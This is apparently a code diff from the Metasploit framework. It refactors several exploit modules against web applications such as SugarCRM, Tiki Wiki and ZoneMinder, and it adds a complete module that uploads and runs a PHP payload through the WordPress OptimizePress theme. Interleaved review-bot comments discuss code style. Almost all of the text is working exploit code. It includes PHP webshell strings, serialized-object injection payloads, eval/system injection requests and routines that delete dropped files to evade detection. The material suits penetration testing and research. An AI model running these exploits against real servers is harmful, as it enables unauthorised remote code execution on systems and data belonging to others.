res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end end
end end


@ -64,12 +64,11 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
@session_id = "" @session_id = ""
@peer = "#{rhost}:#{rport}"
login login
if not @session_id or @session_id.empty? if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed" print_error "#{peer} - Authentication failed"
return Exploit::CheckCode::Unknown return Exploit::CheckCode::Unknown
end end
@ -105,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
if res and res.code == 303 if res and res.code == 303
@session_id = res["Set-Cookie"] @session_id = res["Set-Cookie"]
print_good "#{@peer} - Authentication successful" print_good "#{peer} - Authentication successful"
end end
end end
@ -113,17 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
@uri = normalize_uri(target_uri.path) @uri = normalize_uri(target_uri.path)
@uri << '/' if @uri[-1,1] != '/' @uri << '/' if @uri[-1,1] != '/'
@session_id = "" @session_id = ""
@peer = "#{rhost}:#{rport}"
print_status "#{@peer} - Trying login" print_status "#{peer} - Trying login"
login login
if not @session_id or @session_id.empty? if not @session_id or @session_id.empty?
print_error "#{@peer} - Authentication failed" print_error "#{peer} - Authentication failed"
return return
end end
print_status "#{@peer} - Authentication successfully, trying to exploit" print_status "#{peer} - Authentication successfully, trying to exploit"
data = "rs=passthru&" data = "rs=passthru&"
data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&"
@ -140,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 or not res.body =~ /\+/ if not res or res.code != 200 or not res.body =~ /\+/
print_error "#{@peer} - Exploitation failed" print_error "#{peer} - Exploitation failed"
return return
end end


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def cookie_prefix def cookie_prefix
print_status("#{@peer} - Checking for cookie prefix") print_status("#{peer} - Checking for cookie prefix")
cookie_prefix = "" cookie_prefix = ""
res = send_request_cgi( res = send_request_cgi(
{ {
@ -76,14 +76,13 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/ if res and res.code == 200 and res.headers['Set-Cookie'] =~ /(.+)session/
print_status("#{@peer} - Cookie prefix #{$1} found") print_status("#{peer} - Cookie prefix #{$1} found")
cookie_prefix = $1 cookie_prefix = $1
end end
return cookie_prefix return cookie_prefix
end end
def check def check
@peer = "#{rhost}:#{rport}"
check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}') check_str = Rex::Text.uri_encode('a:1:{i:0;O:1:"x":0:{}}')
res = send_request_cgi( res = send_request_cgi(
{ {
@ -105,18 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter" if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{@upload_php}") print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php) client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja") print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
def exploit def exploit
@upload_php = rand_text_alpha(rand(4) + 4) + ".php" @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
# get_write_exec_payload uses a function, which limits our ability to support # get_write_exec_payload uses a function, which limits our ability to support
# Linux payloads, because that requires a space: # Linux payloads, because that requires a space:
@ -131,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -141,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}") print_error("#{peer} - Exploit failed: #{res.code}")
return return
end end
print_status("#{@peer} - Executing the payload #{@upload_php}") print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"})
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end


@ -26,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'drone (@dronesec)', # Discovery and PoC 'drone', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
], ],
'References' => 'References' =>
[ [


@ -93,24 +93,24 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@peer = "#{rhost}:#{rport}"
code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&")) code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&"))
rand_key_value = rand_text_alphanumeric(rand(10)+6) rand_key_value = rand_text_alphanumeric(rand(10)+6)
# send payload # send payload
print_status("#{@peer} - Sending payload (#{code.length} bytes)") print_status("#{peer} - Sending payload (#{code.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}"
}) })
if res and res.code == 500 if res and res.code == 500
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end


@ -0,0 +1,147 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class Metasploit3 < Msf::Exploit::Remote
include Msf::HTTP::Wordpress
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress OptimizePress Theme File Upload Vulnerability',
'Description' => %q{
This module exploits a vulnerability found in the the Wordpress theme OptimizePress. The
vulnerability is due to an insecure file upload on the media-upload.php component, allowing
an attacker to upload arbitrary PHP code. This module has been tested successfully on
OptimizePress 1.45.
},
'Author' =>
[
'United of Muslim Cyber Army', # Vulnerability discovery
'Mekanismen' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [ ['OptimizePress', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 29 2013'
))
register_advanced_options(
[
OptString.new('THEMEDIR', [ true, 'OptimizePress Theme directory', 'OptimizePress'])
])
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
if res and res.code == 200 and res.body.to_s =~ /Upload New Image/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
uri = normalize_uri(target_uri.path)
#get upload filepath
print_status("#{peer} - Getting the upload path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
if res.body =~ /<input name="imgpath" type="hidden" id="imgpath" value="(.*)" \/>/
file_path = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
#set cookie
cookie = res.get_cookies
filename = rand_text_alphanumeric(8) + ".php"
#upload payload
post_data = Rex::MIME::Message.new
post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"newcsimg\"; filename=\"#(unknown)\"")
post_data.add_part("Upload File", nil, nil, "form-data; name=\"button\"")
post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"")
post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"")
print_status("#{peer} - Uploading PHP payload...")
n_data = post_data.to_s
n_data = n_data.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
'data' => n_data,
'headers' => {
'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
end
print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
#get path to payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
end
payload_url = ""
if res.body =~ /name="cs_img" value="(.*#(unknown).*)" \/> <span/
payload_url =$1
else
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
end
begin
u = URI(payload_url)
rescue ::URI::InvalidURIError
fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
end
register_files_for_cleanup(File::basename(u.path))
print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => u.path
})
end
end
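Review bot: `check` falls through to `Exploit::CheckCode::Safe` for any response that is not a 200 containing `Upload New Image`, including `res` being nil because the host never answered, which reports a negative result that was never actually established; the fall-through should be `Exploit::CheckCode::Unknown`, with `Safe` reserved for a real answer lacking the marker, e.g. `return Exploit::CheckCode::Safe if res` followed by `return Exploit::CheckCode::Unknown`. The `Referer` header in `exploit` also hard-codes `themes/OptimizePress/` while every other path in the module is built from `datastore['THEMEDIR']`, so changing the advanced option leaves the two inconsistent; `'Referer' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')` keeps them aligned. Finally, `register_files_for_cleanup(File::basename(u.path))` hands FileDropper a bare basename, which presumably only works because the PHP payload runs with the upload directory as its working directory — a one-line comment stating that assumption would save the next maintainer from "fixing" it.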


@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw({'uri' => "#{base}/tools#{uri}"}) res = send_request_raw({'uri' => "#{base}/tools#{uri}"})
if res and res.code == 404 if res and res.code == 404
print_error("#{@peer} - The upload most likely failed") print_error("#{peer} - The upload most likely failed")
return return
end end
@ -110,8 +110,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/' uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.") base = File.dirname("#{uri}.")
@ -125,15 +123,15 @@ class Metasploit3 < Msf::Exploit::Remote
p = get_write_exec_payload(:unlink_self=>true) p = get_write_exec_payload(:unlink_self=>true)
print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...") print_status("#{peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
res = upload_php(base, php_fname, p, folder_name) res = upload_php(base, php_fname, p, folder_name)
if not res if not res
print_error("#{@peer} - No response from server") print_error("#{peer} - No response from server")
return return
end end
print_status("#{@peer} - Executing '#{php_fname}'...") print_status("#{peer} - Executing '#{php_fname}'...")
exec_php(base, res) exec_php(base, res)
end end
end end


@ -63,11 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
f = "pathCache.php" f = "pathCache.php"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{f}") print_warning("#{peer} - Deleting #{f}")
client.fs.file.rm(f) client.fs.file.rm(f)
print_good("#{@peer} - #{f} removed to stay ninja") print_good("#{peer} - #{f} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
base = normalize_uri(target_uri.path) base = normalize_uri(target_uri.path)
@peer = "#{rhost}:#{rport}"
username = datastore['USERNAME'] username = datastore['USERNAME']
password = datastore['PASSWORD'] password = datastore['PASSWORD']
@ -97,18 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie'] if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
print_error("#{@peer} - Login failed with \"#{username}:#{password}\"") print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
return return
end end
if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/ if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
session_id = $1 session_id = $1
else else
print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)") print_error("#{peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
return return
end end
print_status("#{@peer} - Login successful with #{username}:#{password}") print_status("#{peer} - Login successful with #{username}:#{password}")
data = "module=Contacts&" data = "module=Contacts&"
data << "Contacts2_CONTACT_offset=1&" data << "Contacts2_CONTACT_offset=1&"
@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";} #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30=" data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
print_status("#{@peer} - Exploiting the unserialize()") print_status("#{peer} - Exploiting the unserialize()")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -130,11 +129,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}") print_error("#{peer} - Exploit failed: #{res.code}")
return return
end end
print_status("#{@peer} - Executing the payload") print_status("#{peer} - Executing the payload")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -146,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end


@ -66,11 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
if client.type == "meterpreter" if client.type == "meterpreter"
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Deleting #{@upload_php}") print_warning("#{peer} - Deleting #{@upload_php}")
client.fs.file.rm(@upload_php) client.fs.file.rm(@upload_php)
print_good("#{@peer} - #{@upload_php} removed to stay ninja") print_good("#{peer} - #{@upload_php} removed to stay ninja")
rescue rescue
print_error("#{@peer} - Unable to remove #{f}") print_error("#{peer} - Unable to remove #{f}")
end end
end end
end end
@ -79,9 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
@upload_php = rand_text_alpha(rand(4) + 4) + ".php" @upload_php = rand_text_alpha(rand(4) + 4) + ".php"
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") print_status("#{peer} - Disclosing the path of the Tiki Wiki on the filesystem")
res = send_request_cgi( res = send_request_cgi(
'uri' => normalize_uri(base, "tiki-rss_error.php") 'uri' => normalize_uri(base, "tiki-rss_error.php")
@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
return return
else else
tiki_path = $1 tiki_path = $1
print_good "#{@peer} - Tiki Wiki path disclosure: #{tiki_path}" print_good "#{peer} - Tiki Wiki path disclosure: #{tiki_path}"
end end
php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>" php_payload = "<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>"
@ -106,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}" printpages << "{s:4:\"name\";s:#{php_payload.length}:\"#{php_payload}\";}}"
printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}" printpages << "s:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}"
print_status("#{@peer} - Exploiting the unserialize() to upload PHP code") print_status("#{peer} - Exploiting the unserialize() to upload PHP code")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -118,11 +117,11 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if not res or res.code != 200 if not res or res.code != 200
print_error("#{@peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.") print_error("#{peer} - Exploit failed: #{res.code}. The Tiki Wiki Multiprint feature must be enabled.")
return return
end end
print_status("#{@peer} - Executing the payload #{@upload_php}") print_status("#{peer} - Executing the payload #{@upload_php}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -134,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res if res
print_error("#{@peer} - Payload execution failed: #{res.code}") print_error("#{peer} - Payload execution failed: #{res.code}")
return return
end end


@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
base = target_uri.path base = target_uri.path
base << '/' if base[-1, 1] != '/' base << '/' if base[-1, 1] != '/'
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6)
@ -109,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
command = Rex::Text.uri_encode(payload.encoded) command = Rex::Text.uri_encode(payload.encoded)
# login # login
print_status("#{@peer} - Authenticating as user '#{user}'") print_status("#{peer} - Authenticating as user '#{user}'")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -118,15 +116,15 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{data}", 'data' => "#{data}",
}) })
if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/
fail_with(Failure::NoAccess, "#{@peer} - Authentication failed") fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
print_good("#{@peer} - Authenticated successfully") print_good("#{peer} - Authenticated successfully")
# send payload # send payload
print_status("#{@peer} - Sending payload (#{command.length} bytes)") print_status("#{peer} - Sending payload (#{command.length} bytes)")
begin begin
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -135,12 +133,12 @@ class Metasploit3 < Msf::Exploit::Remote
'cookie' => "#{cookie}" 'cookie' => "#{cookie}"
}) })
if res and res.code == 200 if res and res.code == 200
print_good("#{@peer} - Payload sent successfully") print_good("#{peer} - Payload sent successfully")
else else
fail_with(Failure::UnexpectedReply, "#{@peer} - Sending payload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
fail_with(Failure::Unreachable, "#{@peer} - Connection failed") fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end end
end end


@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access", 'Name' => "MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability on Microsoft Silverlight. The vulnerability exists on This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order to dereference arbitrary memory which easily leverages to arbitrary code execution. In order


@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' => 'Targets' =>
[ [
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit) # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Starndard 2010', {}], ['Windows XP SP3 with Office Standard 2010', {}],
], ],
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement 'DisclosureDate' => "Nov 5 2013", # Microsoft announcement


@ -63,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin begin
print_warning("#{@peer} - Removing #{@payload_path}") print_warning("#{peer} - Removing #{@payload_path}")
cli.fs.file.rm(@payload_path) cli.fs.file.rm(@payload_path)
print_good("#{@peer} - #{@payload_path} deleted") print_good("#{peer} - #{@payload_path} deleted")
rescue ::Exception => e rescue ::Exception => e
print_error("Unable to delete #{@payload_path}: #{e.message}") print_error("Unable to delete #{@payload_path}: #{e.message}")
end end
@ -73,9 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# Generate the ASPX containing the EXE containing the payload # Generate the ASPX containing the EXE containing the payload
exe = generate_payload_exe exe = generate_payload_exe
aspx = Msf::Util::EXE.to_exe_aspx(exe) aspx = Msf::Util::EXE.to_exe_aspx(exe)
@ -128,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
# UPLOAD # UPLOAD
# #
attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx" attack_url = uri_path + "CCRWebClient/Wallboard/ImageUpload.ashx"
print_status("#{@peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...") print_status("#{peer} - Uploading #{aspx_b64.length} bytes through #{attack_url}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => attack_url, 'uri' => attack_url,
@ -140,9 +137,9 @@ class Metasploit3 < Msf::Exploit::Remote
payload_url = "" payload_url = ""
@payload_path = "" @payload_path = ""
if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/ if res and res.code == 200 and res.body =~ /"Key":"RadUAG_success","Value":true/
print_good("#{@peer} - Payload uploaded successfuly") print_good("#{peer} - Payload uploaded successfuly")
else else
print_error("#{@peer} - Payload upload failed") print_error("#{peer} - Payload upload failed")
return return
end end
@ -150,15 +147,15 @@ class Metasploit3 < Msf::Exploit::Remote
if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/ if res.body =~ /\{"Key":"RadUAG_filePath","Value":"(.*)"\},\{"Key":"RadUAG_associatedData/
@payload_path = $1 @payload_path = $1
print_status("#{@peer} - Payload stored on #{@payload_path}") print_status("#{peer} - Payload stored on #{@payload_path}")
else else
print_error("#{@peer} - The payload file path couldn't be retrieved") print_error("#{peer} - The payload file path couldn't be retrieved")
end end
if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/ if res.body =~ /\[\{"Key":"UploadedImageURL","Value":"(.*)"\}\]/
payload_url = URI($1).path payload_url = URI($1).path
else else
print_error("#{@peer} - The payload URI couldn't be retrieved... Aborting!") print_error("#{peer} - The payload URI couldn't be retrieved... Aborting!")
return return
end end
@ -166,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# EXECUTE # EXECUTE
# #
print_status("#{@peer} - Executing #{payload_url}...") print_status("#{peer} - Executing #{payload_url}...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => payload_url, 'uri' => payload_url,
@ -174,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 20) }, 20)
if (!res or (res and res.code != 200)) if (!res or (res and res.code != 200))
print_error("#{@peer} - Execution failed on #{payload_url} [No Response]") print_error("#{peer} - Execution failed on #{payload_url} [No Response]")
return return
end end
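Review bot: The `rescue ::Exception => e` in the cleanup block at the top of this section still swallows every exception, including interrupts, while the commit rewrites the lines around it; `rescue ::StandardError => e` would let a Ctrl-C propagate instead of being reported as a failed delete. That `print_error` is also the only message in the section without the `#{peer} - ` prefix the rest of the file now uses; `print_error("#{peer} - Unable to delete #{@payload_path}: #{e.message}")` would make it consistent. Further down, `if (!res or (res and res.code != 200))` reads more directly as `unless res && res.code == 200`. Both the cleanup method and `exploit` continue outside the hunks shown here, and the `peer` helper is presumably supplied by the HttpClient mixin rather than defined in this file.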


@ -68,8 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
@peer = "#{rhost}:#{rport}"
# New lines are handled on the vuln app and payload is corrupted # New lines are handled on the vuln app and payload is corrupted
jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
@ -86,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = post_data.to_s data = post_data.to_s
data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
print_status("#{@peer} - Uploading the JSP payload...") print_status("#{peer} - Uploading the JSP payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
'method' => 'POST', 'method' => 'POST',
@ -96,13 +94,13 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
if res and res.code == 200 and res.body.empty? if res and res.code == 200 and res.body.empty?
print_status("#{@peer} - JSP payload uploaded successfully") print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup(jsp_name) register_files_for_cleanup(jsp_name)
else else
fail_with(Failure::Unknown, "#{@peer} - JSP payload upload failed") fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end end
print_status("#{@peer} - Executing payload...") print_status("#{peer} - Executing payload...")
send_request_cgi({ send_request_cgi({
'uri' => normalize_uri(jsp_name), 'uri' => normalize_uri(jsp_name),
'method' => 'GET' 'method' => 'GET'
